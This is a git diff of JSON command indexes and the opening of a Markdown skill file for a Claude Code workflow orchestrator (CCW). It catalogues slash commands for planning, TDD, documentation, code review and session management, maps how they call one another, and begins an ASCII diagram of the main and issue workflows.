||||
"category": "workflow",
|
||||
"subcategory": "tools",
|
||||
"usage_scenario": "implementation",
|
||||
"difficulty": "Advanced",
|
||||
"source": "../../../commands/workflow/tools/task-generate-agent.md"
|
||||
},
|
||||
{
|
||||
"name": "task-generate-tdd",
|
||||
"command": "/workflow:tools:task-generate-tdd",
|
||||
"description": "Autonomous TDD task generation using action-planning-agent with Red-Green-Refactor cycles, test-first structure, and cycle validation",
|
||||
"arguments": "--session WFS-session-id",
|
||||
"category": "workflow",
|
||||
"subcategory": "tools",
|
||||
"usage_scenario": "implementation",
|
||||
"difficulty": "Advanced",
|
||||
"source": "../../../commands/workflow/tools/task-generate-tdd.md"
|
||||
},
|
||||
{
|
||||
"name": "test-task-generate",
|
||||
"command": "/workflow:tools:test-task-generate",
|
||||
"description": "Generate test planning documents (IMPL_PLAN.md, test task JSONs, TODO_LIST.md) using action-planning-agent - produces test planning artifacts, does NOT execute tests",
|
||||
"arguments": "--session WFS-test-session-id",
|
||||
"category": "workflow",
|
||||
"subcategory": "tools",
|
||||
"usage_scenario": "implementation",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/tools/test-task-generate.md"
|
||||
},
|
||||
{
|
||||
"name": "generate",
|
||||
"command": "/workflow:ui-design:generate",
|
||||
"description": "Assemble UI prototypes by combining layout templates with design tokens (default animation support), pure assembler without new content generation",
|
||||
"arguments": "[--design-id <id>] [--session <id>]",
|
||||
"category": "workflow",
|
||||
"subcategory": "ui-design",
|
||||
"usage_scenario": "implementation",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/ui-design/generate.md"
|
||||
}
|
||||
],
|
||||
"planning": [
|
||||
{
|
||||
"name": "plan",
|
||||
"command": "/issue:plan",
|
||||
"description": "Batch plan issue resolution using issue-plan-agent (explore + plan closed-loop)",
|
||||
"arguments": "--all-pending <issue-id>[,<issue-id>,...] [--batch-size 3] ",
|
||||
"category": "issue",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "planning",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/issue/plan.md"
|
||||
},
|
||||
{
|
||||
"name": "breakdown",
|
||||
"command": "/task:breakdown",
|
||||
"description": "Decompose complex task into subtasks with dependency mapping, creates child task JSONs with parent references and execution order",
|
||||
"arguments": "task-id",
|
||||
"category": "task",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "planning",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/task/breakdown.md"
|
||||
},
|
||||
{
|
||||
"name": "replan",
|
||||
"command": "/task:replan",
|
||||
"description": "Update task JSON with new requirements or batch-update multiple tasks from verification report, tracks changes in task-changes.json",
|
||||
"arguments": "task-id [\\\"text\\\"|file.md] | --batch [verification-report.md]",
|
||||
"category": "task",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "planning",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/task/replan.md"
|
||||
},
|
||||
{
|
||||
"name": "action-plan-verify",
|
||||
"command": "/workflow:action-plan-verify",
|
||||
"description": "Perform non-destructive cross-artifact consistency analysis between IMPL_PLAN.md and task JSONs with quality gate validation",
|
||||
"arguments": "[optional: --session session-id]",
|
||||
"category": "workflow",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "planning",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/action-plan-verify.md"
|
||||
},
|
||||
{
|
||||
"name": "api-designer",
|
||||
"command": "/workflow:brainstorm:api-designer",
|
||||
"description": "Generate or update api-designer/analysis.md addressing guidance-specification discussion points for API design perspective",
|
||||
"arguments": "optional topic - uses existing framework if available",
|
||||
"category": "workflow",
|
||||
"subcategory": "brainstorm",
|
||||
"usage_scenario": "planning",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/brainstorm/api-designer.md"
|
||||
},
|
||||
{
|
||||
"name": "ui-designer",
|
||||
"command": "/workflow:brainstorm:ui-designer",
|
||||
"description": "Generate or update ui-designer/analysis.md addressing guidance-specification discussion points for UI design perspective",
|
||||
"arguments": "optional topic - uses existing framework if available",
|
||||
"category": "workflow",
|
||||
"subcategory": "brainstorm",
|
||||
"usage_scenario": "planning",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/brainstorm/ui-designer.md"
|
||||
},
|
||||
{
|
||||
"name": "lite-plan",
|
||||
"command": "/workflow:lite-plan",
|
||||
"description": "Lightweight interactive planning workflow with in-memory planning, code exploration, and execution dispatch to lite-execute after user confirmation",
|
||||
"arguments": "[-e|--explore] \\\"task description\\\"|file.md",
|
||||
"category": "workflow",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "planning",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/lite-plan.md"
|
||||
},
|
||||
{
|
||||
"name": "plan",
|
||||
"command": "/workflow:plan",
|
||||
"description": "5-phase planning workflow with action-planning-agent task generation, outputs IMPL_PLAN.md and task JSONs",
|
||||
"arguments": "\\\"text description\\\"|file.md",
|
||||
"category": "workflow",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "planning",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/plan.md"
|
||||
},
|
||||
{
|
||||
"name": "replan",
|
||||
"command": "/workflow:replan",
|
||||
"description": "Interactive workflow replanning with session-level artifact updates and boundary clarification through guided questioning",
|
||||
"arguments": "[--session session-id] [task-id] \\\"requirements\\\"|file.md [--interactive]",
|
||||
"category": "workflow",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "planning",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/replan.md"
|
||||
},
|
||||
{
|
||||
"name": "tdd-plan",
|
||||
"command": "/workflow:tdd-plan",
|
||||
"description": "TDD workflow planning with Red-Green-Refactor task chain generation, test-first development structure, and cycle tracking",
|
||||
"arguments": "\\\"feature description\\\"|file.md",
|
||||
"category": "workflow",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "planning",
|
||||
"difficulty": "Advanced",
|
||||
"source": "../../../commands/workflow/tdd-plan.md"
|
||||
},
|
||||
{
|
||||
"name": "workflow:ui-design:codify-style",
|
||||
"command": "/workflow:ui-design:codify-style",
|
||||
"description": "Orchestrator to extract styles from code and generate shareable reference package with preview (automatic file discovery)",
|
||||
"arguments": "<path> [--package-name <name>] [--output-dir <path>] [--overwrite]",
|
||||
"category": "workflow",
|
||||
"subcategory": "ui-design",
|
||||
"usage_scenario": "planning",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/ui-design/codify-style.md"
|
||||
},
|
||||
{
|
||||
"name": "design-sync",
|
||||
"command": "/workflow:ui-design:design-sync",
|
||||
"description": "Synchronize finalized design system references to brainstorming artifacts, preparing them for /workflow:plan consumption",
|
||||
"arguments": "--session <session_id> [--selected-prototypes \"<list>\"]",
|
||||
"category": "workflow",
|
||||
"subcategory": "ui-design",
|
||||
"usage_scenario": "planning",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/ui-design/design-sync.md"
|
||||
},
|
||||
{
|
||||
"name": "workflow:ui-design:import-from-code",
|
||||
"command": "/workflow:ui-design:import-from-code",
|
||||
"description": "Import design system from code files (CSS/JS/HTML/SCSS) with automatic file discovery and parallel agent analysis",
|
||||
"arguments": "[--design-id <id>] [--session <id>] [--source <path>]",
|
||||
"category": "workflow",
|
||||
"subcategory": "ui-design",
|
||||
"usage_scenario": "planning",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/ui-design/import-from-code.md"
|
||||
},
|
||||
{
|
||||
"name": "workflow:ui-design:reference-page-generator",
|
||||
"command": "/workflow:ui-design:reference-page-generator",
|
||||
"description": "Generate multi-component reference pages and documentation from design run extraction",
|
||||
"arguments": "[--design-run <path>] [--package-name <name>] [--output-dir <path>]",
|
||||
"category": "workflow",
|
||||
"subcategory": "ui-design",
|
||||
"usage_scenario": "planning",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/ui-design/reference-page-generator.md"
|
||||
}
|
||||
],
|
||||
"documentation": [
|
||||
{
|
||||
"name": "code-map-memory",
|
||||
"command": "/memory:code-map-memory",
|
||||
"description": "3-phase orchestrator: parse feature keyword → cli-explore-agent analyzes (Deep Scan dual-source) → orchestrator generates Mermaid docs + SKILL package (skips phase 2 if exists)",
|
||||
"arguments": "\\\"feature-keyword\\\" [--regenerate] [--tool <gemini|qwen>]",
|
||||
"category": "memory",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "documentation",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/memory/code-map-memory.md"
|
||||
},
|
||||
{
|
||||
"name": "docs-full-cli",
|
||||
"command": "/memory:docs-full-cli",
|
||||
"description": "Generate full project documentation using CLI execution (Layer 3→1) with batched agents (4 modules/agent) and gemini→qwen→codex fallback, <20 modules uses direct parallel",
|
||||
"arguments": "[path] [--tool <gemini|qwen|codex>]",
|
||||
"category": "memory",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "documentation",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/memory/docs-full-cli.md"
|
||||
},
|
||||
{
|
||||
"name": "docs-related-cli",
|
||||
"command": "/memory:docs-related-cli",
|
||||
"description": "Generate/update documentation for git-changed modules using CLI execution with batched agents (4 modules/agent) and gemini→qwen→codex fallback, <15 modules uses direct parallel",
|
||||
"arguments": "[--tool <gemini|qwen|codex>]",
|
||||
"category": "memory",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "documentation",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/memory/docs-related-cli.md"
|
||||
},
|
||||
{
|
||||
"name": "docs",
|
||||
"command": "/memory:docs",
|
||||
"description": "Plan documentation workflow with dynamic grouping (≤10 docs/task), generates IMPL tasks for parallel module trees, README, ARCHITECTURE, and HTTP API docs",
|
||||
"arguments": "[path] [--tool <gemini|qwen|codex>] [--mode <full|partial>] [--cli-execute]",
|
||||
"category": "memory",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "documentation",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/memory/docs.md"
|
||||
},
|
||||
{
|
||||
"name": "load-skill-memory",
|
||||
"command": "/memory:load-skill-memory",
|
||||
"description": "Activate SKILL package (auto-detect from paths/keywords or manual) and intelligently load documentation based on task intent keywords",
|
||||
"arguments": "[skill_name] \\\"task intent description\\",
|
||||
"category": "memory",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "documentation",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/memory/load-skill-memory.md"
|
||||
},
|
||||
{
|
||||
"name": "skill-memory",
|
||||
"command": "/memory:skill-memory",
|
||||
"description": "4-phase autonomous orchestrator: check docs → /memory:docs planning → /workflow:execute → generate SKILL.md with progressive loading index (skips phases 2-3 if docs exist)",
|
||||
"arguments": "[path] [--tool <gemini|qwen|codex>] [--regenerate] [--mode <full|partial>] [--cli-execute]",
|
||||
"category": "memory",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "documentation",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/memory/skill-memory.md"
|
||||
},
|
||||
{
|
||||
"name": "style-skill-memory",
|
||||
"command": "/memory:style-skill-memory",
|
||||
"description": "Generate SKILL memory package from style reference for easy loading and consistent design system usage",
|
||||
"arguments": "[package-name] [--regenerate]",
|
||||
"category": "memory",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "documentation",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/memory/style-skill-memory.md"
|
||||
},
|
||||
{
|
||||
"name": "swagger-docs",
|
||||
"command": "/memory:swagger-docs",
|
||||
"description": "Generate complete Swagger/OpenAPI documentation following RESTful standards with global security, API details, error codes, and validation tests",
|
||||
"arguments": "[path] [--tool <gemini|qwen|codex>] [--format <yaml|json>] [--version <v3.0|v3.1>] [--lang <zh|en>]",
|
||||
"category": "memory",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "documentation",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/memory/swagger-docs.md"
|
||||
},
|
||||
{
|
||||
"name": "workflow-skill-memory",
|
||||
"command": "/memory:workflow-skill-memory",
|
||||
"description": "Process WFS-* archived sessions using universal-executor agents with Gemini analysis to generate workflow-progress SKILL package (sessions-timeline, lessons, conflicts)",
|
||||
"arguments": "session <session-id> | all",
|
||||
"category": "memory",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "documentation",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/memory/workflow-skill-memory.md"
|
||||
}
|
||||
],
|
||||
"analysis": [
|
||||
{
|
||||
"name": "review-fix",
|
||||
"command": "/workflow:review-fix",
|
||||
"description": "Automated fixing of code review findings with AI-powered planning and coordinated execution. Uses intelligent grouping, multi-stage timeline coordination, and test-driven verification.",
|
||||
"arguments": "<export-file|review-dir> [--resume] [--max-iterations=N]",
|
||||
"category": "workflow",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "analysis",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/review-fix.md"
|
||||
},
|
||||
{
|
||||
"name": "review-module-cycle",
|
||||
"command": "/workflow:review-module-cycle",
|
||||
"description": "Independent multi-dimensional code review for specified modules/files. Analyzes specific code paths across 7 dimensions with hybrid parallel-iterative execution, independent of workflow sessions.",
|
||||
"arguments": "<path-pattern> [--dimensions=security,architecture,...] [--max-iterations=N]",
|
||||
"category": "workflow",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "analysis",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/review-module-cycle.md"
|
||||
},
|
||||
{
|
||||
"name": "review",
|
||||
"command": "/workflow:review",
|
||||
"description": "Post-implementation review with specialized types (security/architecture/action-items/quality) using analysis agents and Gemini",
|
||||
"arguments": "[--type=security|architecture|action-items|quality] [--archived] [optional: session-id]",
|
||||
"category": "workflow",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "analysis",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/review.md"
|
||||
}
|
||||
],
|
||||
"session-management": [
|
||||
{
|
||||
"name": "review-session-cycle",
|
||||
"command": "/workflow:review-session-cycle",
|
||||
"description": "Session-based comprehensive multi-dimensional code review. Analyzes git changes from workflow session across 7 dimensions with hybrid parallel-iterative execution, aggregates findings, and performs focused deep-dives on critical issues until quality gates met.",
|
||||
"arguments": "[session-id] [--dimensions=security,architecture,...] [--max-iterations=N]",
|
||||
"category": "workflow",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "session-management",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/review-session-cycle.md"
|
||||
},
|
||||
{
|
||||
"name": "complete",
|
||||
"command": "/workflow:session:complete",
|
||||
"description": "Mark active workflow session as complete, archive with lessons learned, update manifest, remove active flag",
|
||||
"arguments": "",
|
||||
"category": "workflow",
|
||||
"subcategory": "session",
|
||||
"usage_scenario": "session-management",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/session/complete.md"
|
||||
},
|
||||
{
|
||||
"name": "resume",
|
||||
"command": "/workflow:session:resume",
|
||||
"description": "Resume the most recently paused workflow session with automatic session discovery and status update",
|
||||
"arguments": "",
|
||||
"category": "workflow",
|
||||
"subcategory": "session",
|
||||
"usage_scenario": "session-management",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/session/resume.md"
|
||||
}
|
||||
],
|
||||
"testing": [
|
||||
{
|
||||
"name": "tdd-verify",
|
||||
"command": "/workflow:tdd-verify",
|
||||
"description": "Verify TDD workflow compliance against Red-Green-Refactor cycles, generate quality report with coverage analysis",
|
||||
"arguments": "[optional: WFS-session-id]",
|
||||
"category": "workflow",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "testing",
|
||||
"difficulty": "Advanced",
|
||||
"source": "../../../commands/workflow/tdd-verify.md"
|
||||
},
|
||||
{
|
||||
"name": "test-fix-gen",
|
||||
"command": "/workflow:test-fix-gen",
|
||||
"description": "Create test-fix workflow session from session ID, description, or file path with test strategy generation and task planning",
|
||||
"arguments": "(source-session-id | \\\"feature description\\\" | /path/to/file.md)",
|
||||
"category": "workflow",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "testing",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/test-fix-gen.md"
|
||||
},
|
||||
{
|
||||
"name": "test-gen",
|
||||
"command": "/workflow:test-gen",
|
||||
"description": "Create independent test-fix workflow session from completed implementation session, analyzes code to generate test tasks",
|
||||
"arguments": "source-session-id",
|
||||
"category": "workflow",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "testing",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/test-gen.md"
|
||||
},
|
||||
{
|
||||
"name": "tdd-coverage-analysis",
|
||||
"command": "/workflow:tools:tdd-coverage-analysis",
|
||||
"description": "Analyze test coverage and TDD cycle execution with Red-Green-Refactor compliance verification",
|
||||
"arguments": "--session WFS-session-id",
|
||||
"category": "workflow",
|
||||
"subcategory": "tools",
|
||||
"usage_scenario": "testing",
|
||||
"difficulty": "Advanced",
|
||||
"source": "../../../commands/workflow/tools/tdd-coverage-analysis.md"
|
||||
},
|
||||
{
|
||||
"name": "test-concept-enhanced",
|
||||
"command": "/workflow:tools:test-concept-enhanced",
|
||||
"description": "Coordinate test analysis workflow using cli-execution-agent to generate test strategy via Gemini",
|
||||
"arguments": "--session WFS-test-session-id --context path/to/test-context-package.json",
|
||||
"category": "workflow",
|
||||
"subcategory": "tools",
|
||||
"usage_scenario": "testing",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/tools/test-concept-enhanced.md"
|
||||
},
|
||||
{
|
||||
"name": "test-context-gather",
|
||||
"command": "/workflow:tools:test-context-gather",
|
||||
"description": "Collect test coverage context using test-context-search-agent and package into standardized test-context JSON",
|
||||
"arguments": "--session WFS-test-session-id",
|
||||
"category": "workflow",
|
||||
"subcategory": "tools",
|
||||
"usage_scenario": "testing",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/tools/test-context-gather.md"
|
||||
}
|
||||
]
|
||||
}
|
||||
@@ -1,160 +0,0 @@
|
||||
{
|
||||
"workflow:plan": {
|
||||
"calls_internally": [
|
||||
"workflow:session:start",
|
||||
"workflow:tools:context-gather",
|
||||
"workflow:tools:conflict-resolution",
|
||||
"workflow:tools:task-generate-agent"
|
||||
],
|
||||
"next_steps": [
|
||||
"workflow:action-plan-verify",
|
||||
"workflow:status",
|
||||
"workflow:execute"
|
||||
],
|
||||
"alternatives": [
|
||||
"workflow:tdd-plan"
|
||||
],
|
||||
"prerequisites": []
|
||||
},
|
||||
"workflow:tdd-plan": {
|
||||
"calls_internally": [
|
||||
"workflow:session:start",
|
||||
"workflow:tools:context-gather",
|
||||
"workflow:tools:task-generate-tdd"
|
||||
],
|
||||
"next_steps": [
|
||||
"workflow:tdd-verify",
|
||||
"workflow:status",
|
||||
"workflow:execute"
|
||||
],
|
||||
"alternatives": [
|
||||
"workflow:plan"
|
||||
],
|
||||
"prerequisites": []
|
||||
},
|
||||
"workflow:execute": {
|
||||
"prerequisites": [
|
||||
"workflow:plan",
|
||||
"workflow:tdd-plan"
|
||||
],
|
||||
"related": [
|
||||
"workflow:status",
|
||||
"workflow:resume"
|
||||
],
|
||||
"next_steps": [
|
||||
"workflow:review",
|
||||
"workflow:tdd-verify"
|
||||
]
|
||||
},
|
||||
"workflow:action-plan-verify": {
|
||||
"prerequisites": [
|
||||
"workflow:plan"
|
||||
],
|
||||
"next_steps": [
|
||||
"workflow:execute"
|
||||
],
|
||||
"related": [
|
||||
"workflow:status"
|
||||
]
|
||||
},
|
||||
"workflow:tdd-verify": {
|
||||
"prerequisites": [
|
||||
"workflow:execute"
|
||||
],
|
||||
"related": [
|
||||
"workflow:tools:tdd-coverage-analysis"
|
||||
]
|
||||
},
|
||||
"workflow:session:start": {
|
||||
"next_steps": [
|
||||
"workflow:plan",
|
||||
"workflow:execute"
|
||||
],
|
||||
"related": [
|
||||
"workflow:session:list",
|
||||
"workflow:session:resume"
|
||||
]
|
||||
},
|
||||
"workflow:session:resume": {
|
||||
"alternatives": [
|
||||
"workflow:resume"
|
||||
],
|
||||
"related": [
|
||||
"workflow:session:list",
|
||||
"workflow:status"
|
||||
]
|
||||
},
|
||||
"workflow:lite-plan": {
|
||||
"calls_internally": [
|
||||
"workflow:lite-execute"
|
||||
],
|
||||
"next_steps": [
|
||||
"workflow:lite-execute",
|
||||
"workflow:status"
|
||||
],
|
||||
"alternatives": [
|
||||
"workflow:plan"
|
||||
],
|
||||
"prerequisites": []
|
||||
},
|
||||
"workflow:lite-fix": {
|
||||
"next_steps": [
|
||||
"workflow:lite-execute",
|
||||
"workflow:status"
|
||||
],
|
||||
"alternatives": [
|
||||
"workflow:lite-plan"
|
||||
],
|
||||
"related": [
|
||||
"workflow:test-cycle-execute"
|
||||
]
|
||||
},
|
||||
"workflow:lite-execute": {
|
||||
"prerequisites": [
|
||||
"workflow:lite-plan",
|
||||
"workflow:lite-fix"
|
||||
],
|
||||
"related": [
|
||||
"workflow:execute",
|
||||
"workflow:status"
|
||||
]
|
||||
},
|
||||
"workflow:review-session-cycle": {
|
||||
"prerequisites": [
|
||||
"workflow:execute"
|
||||
],
|
||||
"next_steps": [
|
||||
"workflow:review-fix"
|
||||
],
|
||||
"related": [
|
||||
"workflow:review-module-cycle"
|
||||
]
|
||||
},
|
||||
"workflow:review-fix": {
|
||||
"prerequisites": [
|
||||
"workflow:review-module-cycle",
|
||||
"workflow:review-session-cycle"
|
||||
],
|
||||
"related": [
|
||||
"workflow:test-cycle-execute"
|
||||
]
|
||||
},
|
||||
"memory:docs": {
|
||||
"calls_internally": [
|
||||
"workflow:session:start",
|
||||
"workflow:tools:context-gather"
|
||||
],
|
||||
"next_steps": [
|
||||
"workflow:execute"
|
||||
]
|
||||
},
|
||||
"memory:skill-memory": {
|
||||
"next_steps": [
|
||||
"workflow:plan",
|
||||
"cli:analyze"
|
||||
],
|
||||
"related": [
|
||||
"memory:load-skill-memory"
|
||||
]
|
||||
}
|
||||
}
|
||||
@@ -1,112 +0,0 @@
|
||||
[
|
||||
{
|
||||
"name": "lite-plan",
|
||||
"command": "/workflow:lite-plan",
|
||||
"description": "Lightweight interactive planning workflow with in-memory planning, code exploration, and execution dispatch to lite-execute after user confirmation",
|
||||
"arguments": "[-e|--explore] \\\"task description\\\"|file.md",
|
||||
"category": "workflow",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "planning",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/lite-plan.md"
|
||||
},
|
||||
{
|
||||
"name": "lite-fix",
|
||||
"command": "/workflow:lite-fix",
|
||||
"description": "Lightweight bug diagnosis and fix workflow with intelligent severity assessment and optional hotfix mode for production incidents",
|
||||
"arguments": "[--hotfix] \\\"bug description or issue reference\\",
|
||||
"category": "workflow",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "general",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/lite-fix.md"
|
||||
},
|
||||
{
|
||||
"name": "plan",
|
||||
"command": "/workflow:plan",
|
||||
"description": "5-phase planning workflow with action-planning-agent task generation, outputs IMPL_PLAN.md and task JSONs",
|
||||
"arguments": "\\\"text description\\\"|file.md",
|
||||
"category": "workflow",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "planning",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/plan.md"
|
||||
},
|
||||
{
|
||||
"name": "execute",
|
||||
"command": "/workflow:execute",
|
||||
"description": "Coordinate agent execution for workflow tasks with automatic session discovery, parallel task processing, and status tracking",
|
||||
"arguments": "[--resume-session=\\\"session-id\\\"]",
|
||||
"category": "workflow",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "implementation",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/execute.md"
|
||||
},
|
||||
{
|
||||
"name": "start",
|
||||
"command": "/workflow:session:start",
|
||||
"description": "Discover existing sessions or start new workflow session with intelligent session management and conflict detection",
|
||||
"arguments": "[--type <workflow|review|tdd|test|docs>] [--auto|--new] [optional: task description for new session]",
|
||||
"category": "workflow",
|
||||
"subcategory": "session",
|
||||
"usage_scenario": "general",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/session/start.md"
|
||||
},
|
||||
{
|
||||
"name": "review-session-cycle",
|
||||
"command": "/workflow:review-session-cycle",
|
||||
"description": "Session-based comprehensive multi-dimensional code review. Analyzes git changes from workflow session across 7 dimensions with hybrid parallel-iterative execution, aggregates findings, and performs focused deep-dives on critical issues until quality gates met.",
|
||||
"arguments": "[session-id] [--dimensions=security,architecture,...] [--max-iterations=N]",
|
||||
"category": "workflow",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "session-management",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/review-session-cycle.md"
|
||||
},
|
||||
{
|
||||
"name": "docs",
|
||||
"command": "/memory:docs",
|
||||
"description": "Plan documentation workflow with dynamic grouping (≤10 docs/task), generates IMPL tasks for parallel module trees, README, ARCHITECTURE, and HTTP API docs",
|
||||
"arguments": "[path] [--tool <gemini|qwen|codex>] [--mode <full|partial>] [--cli-execute]",
|
||||
"category": "memory",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "documentation",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/memory/docs.md"
|
||||
},
|
||||
{
|
||||
"name": "artifacts",
|
||||
"command": "/workflow:brainstorm:artifacts",
|
||||
"description": "Interactive clarification generating confirmed guidance specification through role-based analysis and synthesis",
|
||||
"arguments": "topic or challenge description [--count N]",
|
||||
"category": "workflow",
|
||||
"subcategory": "brainstorm",
|
||||
"usage_scenario": "general",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/brainstorm/artifacts.md"
|
||||
},
|
||||
{
|
||||
"name": "action-plan-verify",
|
||||
"command": "/workflow:action-plan-verify",
|
||||
"description": "Perform non-destructive cross-artifact consistency analysis between IMPL_PLAN.md and task JSONs with quality gate validation",
|
||||
"arguments": "[optional: --session session-id]",
|
||||
"category": "workflow",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "planning",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/action-plan-verify.md"
|
||||
},
|
||||
{
|
||||
"name": "version",
|
||||
"command": "/version",
|
||||
"description": "Display Claude Code version information and check for updates",
|
||||
"arguments": "",
|
||||
"category": "general",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "general",
|
||||
"difficulty": "Beginner",
|
||||
"source": "../../../commands/version.md"
|
||||
}
|
||||
]
|
||||
@@ -1,462 +1,522 @@
|
||||
---
|
||||
name: ccw
|
||||
description: Stateless workflow orchestrator that automatically selects and executes the optimal workflow combination based on task intent. Supports rapid (lite-plan+execute), full (brainstorm+plan+execute), coupled (plan+execute), bugfix (lite-fix), and issue (multi-point fixes) workflows. Triggers on "ccw", "workflow", "自动工作流", "智能调度".
|
||||
allowed-tools: Task(*), SlashCommand(*), AskUserQuestion(*), Read(*), Bash(*), Grep(*)
|
||||
description: Stateless workflow orchestrator. Auto-selects optimal workflow based on task intent. Triggers "ccw", "workflow".
|
||||
allowed-tools: Task(*), SlashCommand(*), AskUserQuestion(*), Read(*), Bash(*), Grep(*), TodoWrite(*)
|
||||
---
|
||||
|
||||
# CCW - Claude Code Workflow Orchestrator
|
||||
|
||||
无状态工作流协调器,根据任务意图自动选择并执行最优工作流组合。
|
||||
无状态工作流协调器,根据任务意图自动选择最优工作流。
|
||||
|
||||
## Architecture Overview
|
||||
## Workflow System Overview
|
||||
|
||||
CCW 提供两个工作流系统:**Main Workflow** 和 **Issue Workflow**,协同覆盖完整的软件开发生命周期。
|
||||
|
||||
```
|
||||
┌─────────────────────────────────────────────────────────────────────────────┐
|
||||
│ Main Workflow │
|
||||
│ │
|
||||
│ ┌─────────────┐ ┌─────────────┐ ┌─────────────┐ ┌─────────────┐ │
|
||||
│ │ Level 1 │ → │ Level 2 │ → │ Level 3 │ → │ Level 4 │ │
|
||||
│ │ Rapid │ │ Lightweight │ │ Standard │ │ Brainstorm │ │
|
||||
│ │ │ │ │ │ │ │ │ │
|
||||
│ │ lite-lite- │ │ lite-plan │ │ plan │ │ brainstorm │ │
|
||||
│ │ lite │ │ lite-fix │ │ tdd-plan │ │ :auto- │ │
|
||||
│ │ │ │ multi-cli- │ │ test-fix- │ │ parallel │ │
|
||||
│ │ │ │ plan │ │ gen │ │ ↓ │ │
|
||||
│ │ │ │ │ │ │ │ plan │ │
|
||||
│ └─────────────┘ └─────────────┘ └─────────────┘ └─────────────┘ │
|
||||
│ │
|
||||
│ Complexity: ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━▶ │
|
||||
│ Low High │
|
||||
└─────────────────────────────────────────────────────────────────────────────┘
|
||||
│
|
||||
│ After development
|
||||
▼
|
||||
┌─────────────────────────────────────────────────────────────────────────────┐
|
||||
│ Issue Workflow │
|
||||
│ │
|
||||
│ ┌──────────────┐ ┌──────────────┐ ┌──────────────┐ │
|
||||
│ │ Accumulate │ → │ Plan │ → │ Execute │ │
|
||||
│ │ Discover & │ │ Batch │ │ Parallel │ │
|
||||
│ │ Collect │ │ Planning │ │ Execution │ │
|
||||
│ └──────────────┘ └──────────────┘ └──────────────┘ │
|
||||
│ │
|
||||
│ Supplementary role: Maintain main branch stability, worktree isolation │
|
||||
